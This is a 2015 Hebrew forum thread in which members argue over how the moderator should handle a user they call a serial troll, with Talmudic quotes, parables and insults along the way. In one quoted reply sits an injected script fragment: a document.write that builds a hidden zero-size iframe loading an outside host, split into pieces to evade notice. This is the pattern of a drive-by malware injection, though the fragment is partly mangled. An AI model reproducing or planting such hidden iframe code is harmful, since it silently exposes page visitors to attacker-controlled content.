|
|
| נשלח ב-21/5/2015 17:22 |
|
| |
בשם אריאל ובעל בעמיו שאני בטוח שיצטרפו אלי, תודה על האיחול וההערכה!
שים לב מה שבסדר הבנו בוודאי היה עונה לך.
ממה שהבנתי ממנו, הוא רואה את עצמו כהמשך של ישראל המקראי לא פחות ממך וממני.
לפיכך אני משער שגם הוא מתגדר בהיותו שריד של העם היהודי שהגיע עד הלום למרות התפארותם של מחסלינו ואויבינו.
וכפי שאני יכול לסבור שהוא טועה בדברים מסויימים, אפילו חשובים, כך הוא עשוי לחשוב גם לגבי.
כדי שתהיה תועלת לי ולו ולפורום ולכולנו, צריך להזכיר לו (ולמי שצריך) שהדרך היחידה להשיג התקדמות במובן של הבנות ובדיקת דעות היא רק על ידי דיון מכבד. וגם על ידי הימנעות מקפיצה מנושא לנושא.
כל צורה של ביקורת ועלבון רק מרחיקה ומפריעה.
האם לא יותר יעיל - שלא לומר יותר אדיב - לנהוג כפי המלצתי?
|
|
|
| נשלח ב-21/5/2015 18:11 |
|
| |
מיימוני לא יותר יעיל לנהוג לפי המלצתך. הדרך היעילה של הכותבים בפורום להתמודד עם הטרלה סדרתית היא התעלמות מחד, ומאידך ניסיון להוציא משיווי משקל כך שאחרי כמה פעמים (הרבה יותר מדי) ההנהלה תחליט לחסום אותו. כך היה למשל עם מלא_כבודו. משום מה בנושאים אחרים אתה אוהב לעצור ולחשוב, ורק כאשר טרולים באים להחריב לך את הפורום אתה נתקע עם מדיניות מטופשת של הכלה. אגב, יכול להיות שאם כמה אנשים, שאולי אתה מעריך את דעתם בנושאים אחרים בפורום, חושבים כולם שהדרך להתמודד היא שונה, כדאי לעצור, להקשיב להם ולחשוב.
|
|
|
|
| נשלח ב-21/5/2015 19:40 |
|
| |
תוקן על ידי מנהלי_משנה ב- 22/05/2015 14:26:15
|
|
|
|
| נשלח ב-21/5/2015 22:33 |
|
| |
הרב מימוני
גיטין דף נו. אמר רבי יוחנן: ענוותנותו של רבי זכריה בן אבקולס, החריבה את ביתנו,
|
|
|
|
| נשלח ב-21/5/2015 22:56 |
|
| |
פנטסטי. אז יש לנו שנאת חינם, משחק כדור בשבת, וענוונות. כל דכפין ייתי ויבחר.
האמת היא שהבית חרב בגלל תכונות מוכרות מאד לירוחם: שילוב של לאומנות, משיחיות מדינית, חוסר הכרה במגבלות הכח הצבאי, ופרימיטיבות.
|
|
|
|
| נשלח ב-21/5/2015 23:43 |
|
| |
| מיימוני כתב: |  |
ממה שהבנתי ממנו, הוא רואה את עצמו כהמשך של ישראל המקראי לא פחות ממך וממני.
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
אתה באמת הבנת ממנו כך? כי לא ראיתי משהו בדבריו שמלמד על רמז לכך.
|
|
|
|
| נשלח ב-21/5/2015 23:45 |
|
| |
תוקן על ידי מנהלי_משנה ב- 22/05/2015 14:25:17
|
|
|
|
| נשלח ב-22/5/2015 02:34 |
|
| |
רבינו המיימוני: א) אין לי שום בעיה שכל אחד יגיד כאן כל דעה, כפרנית ככל שתהיה. לא היתה לי שום בעיה עם יתכן זיע"א שאשכולותיו הוסיפו עניין לפורום והעלו נושאים קריטיים לדיון. לעומת זאת, יש לי בעיה עם טרולים, יהיו מאמינים ככל שיהיו. למשל דתו של מקס לא מפריעה לי בכלל ואעפ"כ כשחשתי שהוא גלש לטרולינג זה הפריע לי (כמובן שאין להשוותו כלל וכלל לטרול ההרים המפלצתי שלפנינו) וכאן אנו מגיעים לנקודה: בסדר הבנו הוא טרול. נקודה. וכוונתי במשפט זה אינה 'אדם שמציג את דעותיו בחריפות ובעוקצנות' שאני בעד זה (מבלי לוותר על הזכות להגיב לו בעוקצנות) אלא אדם שכל מטרתו בפורום היא להעליב אנשים, לעצבן אותם ולהטריד אותם. יש ניקים שנהנים מזה ומחזירים לו, כך שמתקבלת תחושה של קרב שווה. אבל יש ניקים שנקלעים בטעות לדרכו ונטבחים באכזריות רק כי הטרול ראה אותם. (גם הוא עצמו יודע שהוא טרול, והכחשותיו אינן באות אלא בשל כשל לשוני: בלשון השחורה המדוברת בפי שבטי הטרולים המקומיים, הכינוי לטרול הוא 'אדם' שמשמעו בערך 'זכר מגודל שיכול לטרוף ילדים קטנים שנושמים את האויר שלנו' והכינוי לאדם הוא 'טרול' שמשמעו בערך 'יצור נבזה שנושם את האויר שלנו') זכותך כמנהל להשאיר אותו כדי שיחריב לך את הפורום ויהפוך אותו למאורת התגוששות טרולית, אבל אל תצפה שכמה הערות בסגנון 'נא להתנהג יפה' ישנו אותו. ואפילו אם אתה, כמלאך אלוקים, יכול לנהוג כך, אנשים פשוטים יתקשו לעשות זאת ולא נדרש מהם לעשות זאת - לא יותר משאשה מוכה נדרשת להימנע מלהרגיז את בעלה (וראה להלן)
ב) אם בסדר יחליט להפוך את עורו ולהתחיל להגיב לעניין - אני הראשון שאתמוך בהותרתו בפורום, שוב, ללא קשר לרמת העוקצנות שלו. למעשה, אפילו אשמח לדון עמו כי הוא איש חכם, כפי שניתן לגלות בהתעלמות מערימות הרפש בהן הוא מקיף את עצמו. לא נראה לי שזה יקרה כי מה שמביא אותו לכאן הוא הדחף ההרסני שגורם לטרולים לשוטט ממאורותיהם בלילה ולא רצון להגיב.
ג) שים לב שהערת לכולנו חוץ ממגיב אחד. מי? כן. אתה יודע מי. לדעתי נפלת כאן בכשל הברברי. שעניינו כזה: אדם עני הגיע לנהר. את הנהר ניתן לחצות במעבורת בתמורה לתשלום. ניתן לחצות בגשר בחינם. אבל בסופו ניצב יליד פראי שהורג כל מי שעובר. ניתן גם לשכור שומר ראש. העני התחנן בפני מפעיל המעבורת שירחם עליו ויתיר לו ליסוע בחינם, אבל זה סירב. הוא התחנן בפני גבר חזק שעבר בסביבה שילווה אותו בעת חציית הגשר, זה סירב. לא נותרה לו ברירה. הוא עבר בגשר ונהרג. מי אשם במותו?
שאלו אנשים רבים ותשובותיהם נחלקו בין השומר למפעיל המעבורת, כמעט אף אחד לא הצביע על הברברי כאשם ברצח. כאלו הוא מוכרח לרצוח מטבעו ולכן מותר לו.
ד) אני מאמין שאותך באמת אי אפשר להטריל.
וכמה הערות: 1) בסדר כמעט הודה במפורש שהוא אתם יודעים מי. (בתקיפה על נחמד למראה, וגם אם הוא יטען שלא זו היתה כוונתו, היא היתה) 2) אאוטינג: בסדר הבנו הוא... טים ברנרס לי. (ממציא האינטרנט) 3) איך כותבים פרימטיבי? מסתבר שלדעת בסדר, פרימטבי. בכך הוא מפגין שליטה דקדוקית נדירה מסוג ייחודי שכנראה נעדר אצל דתיים פרימטבים. 4) ישיבישער, באמת תודה על האיחול. 5) שמתם לב כמה פעמים הטרול חוזר על כפיות הטובה שישיבישער מפגין כלפיו? להזכירכם, הטובה האדירה היתה יחס שפוי לעשר שניות. מה שמלמד אותנו על עולם המושגים שלו.
תוקן על ידי אריאל73 ב- 22/05/2015 03:06:07
 |
|
|
|
|
|
| נשלח ב-22/5/2015 07:08 |
|
| |
אני רק רוצה להצביע על פרט טכני אחד: אדם שאומר: נכון, אני מצפצף עליכם ועל החוקים, אבל חסימות לא יעזרו נגדי, כי אני אשחית ואציף לכם את האתר. היה נחסם בכל מקום נורמלי שמכבד את עצמו. ואני מתחיל לחשוד בקונספירציה, שהוא פשוט איים על רג"ס איום טכנולוגי כל שהוא (דהיינו מה שהוא רמז כאן בהודעתו), ולכן הנ"ל מגן עליו בלי קשר.
|
|
|
|
| נשלח ב-22/5/2015 08:27 |
|
| |
הפורום לחינוך מיוחד
|
|
|
|
| נשלח ב-22/5/2015 09:47 |
|
| |
האשכול כבר הפך לדיון ביחס לטרולים.חשבתי לפני שהלכתי לישון על הדברים שמיימוני כתב, והדברים שלי ושל השאר כאן, ועלתה לי תהייה. והיא תהייה כללית ולאו דווקא לגבי המקרה שלנו.
נניח שמישהו יעלה לכאן את האבחון שלו שלפיו הוא לוקה בתסמונת אספרגר (אם קצת תחשבו על זה, זה בהחלט סביר לטרולים באופן כללי). אז אנחנו נראה הכול באור אחר לגמרי. בא אדם שיש לו בעיה להבין קשרים חברתיים, ומנסה ליצור קשרים כאלה, אלא שהוא פשוט עושה את זה בצורה הכי גרועה שאפשר בדיוק בגלל הבעיה שלו. האם לא נהיה סלחניים כלפיו? האם לא ננסה לתת לו להשתלב וללמד אותו בעדינות כיצד משתלבים בחברה?
אבל מה קורה כל עוד הוא לא העלה אבחון? אז אנחנו מתייחסים אליו כרשע. זה נכון גם בהרבה סוגים אחרים של התנהגויות שאנחנו פוגשים וכועסים, ואז אם מגלים שיש בעיה אז מבינים. למשל, איפה שאני גר מסתובבים הרבה נערים עם פיגור קל (כל מיני תסמונות שלפעמים יש להן עוד השלכות). אם הם מרעישים קצת בבית כנסת (הם לא מרעישים הרבה כי לימדו אותם והם 'ילדים טובים'), אף אחד לא כועס עליהם. היחס אליהם הוא כמובן שונה מהיחס לכל אדם אחר. על רובם אפשר לראות שיש בעיה (הרוב תסמונת דאון, שיש לה מאפיינים פיזיולוגיים בולטים), אבל אם מגיע בחור חדש שיש לו בעיה ללא סממנים פיזיולוגיים בהתחלה יכעסו עליו עד שיגלו שיש לו בעיה.השאלה העולה היא איך צריך להתייחס לאדם מראש. זו שאלה שקשורה לנושא של 'לימוד זכות' וגם לשאלה של בחירה חופשית והגדרת 'שוטה' שאין לו בחירה חופשית. האם כשמישהו מתנהג באופן לא יאות אני צריך לנסות לסנגר עליו שיש לו בעיה? האם סנגוריה כזו לא מוציאה את העוקץ מכל הדרישות המוסריות?
תוקן על ידי עצכח ב- 25/05/2015 18:01:50
 |
|
|
|
|
| נשלח ב-22/5/2015 11:15 |
|
| |
תוקן על ידי מנהלי_משנה ב- 22/05/2015 14:27:22
|
|
|
|
| נשלח ב-23/5/2015 02:10 |
|
| |
[כאן הופיע מס' הטלפון של אמו של ישיבישעאאר + קופון הנחה לקבוצות]
נמחק על ידי מנהלי משנה
תוקן על ידי בסדר_הבנו ב- 23/05/2015 02:48:25
|
|
|
|
| נשלח ב-23/5/2015 02:46 |
|
| |
חה חה חה חה חה!
חוסר המודעות העצמית שלכם הוא מקור לא אכזב להלצות.
תוקן על ידי בסדר_הבנו ב- 23/05/2015 02:47:14
תוקן על ידי עצכח ב- 25/05/2015 01:52:01
|
|
|
|
| נשלח ב-25/5/2015 13:04 |
|
| |
בשום פנים ואופן לא.
מדי פעם נוהגים חברי הפורום לשעשע אותי בחוסר המודעות העצמית הקיצוני שלהם.
לא זו הדרך. הבה נכתוב כולנו דיונים ענייניים. אני לפי חוכמתי, ואתם לפי מיעוט השכל הדליל בה חוננה אתכם הקבה"ה. בלי אלימות. בלי צעדים חד צדדיים. כך יהיה נעים יותר לכולם.
תוקן על ידי עצכח ב- 25/05/2015 18:00:46
|
|
|
|
|